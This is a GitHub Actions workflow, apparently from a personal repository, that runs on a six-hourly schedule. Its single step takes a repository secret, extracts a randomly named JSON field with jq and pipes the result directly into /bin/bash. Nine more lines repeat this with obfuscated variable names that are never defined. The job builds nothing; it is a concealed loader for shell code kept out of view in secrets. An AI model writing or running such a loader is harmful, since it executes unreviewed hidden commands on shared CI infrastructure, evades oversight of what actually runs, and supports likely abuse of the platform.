name: zhangshun19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '25 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangshun19871010
        env:
          upqs0: ${{ secrets.upqs0 }}
        run: |
          echo $upqs0 | jq -r .ik8 | /bin/bash
          echo $zqf6 | jq -r .e7 | /bin/bash
          echo $obt11 | jq -r .dyd602 | /bin/bash
          echo $jk6 | jq -r .o60136 | /bin/bash
          echo $rb0289 | jq -r .gvooz0364 | /bin/bash
          echo $nihti344 | jq -r .zfeoh15 | /bin/bash
          echo $pk34 | jq -r .h48 | /bin/bash
          echo $xqwzy85 | jq -r .jkh786 | /bin/bash
          echo $rsvku400 | jq -r .hsg991 | /bin/bash
          echo $wf3 | jq -r .lug2467 | /bin/bash

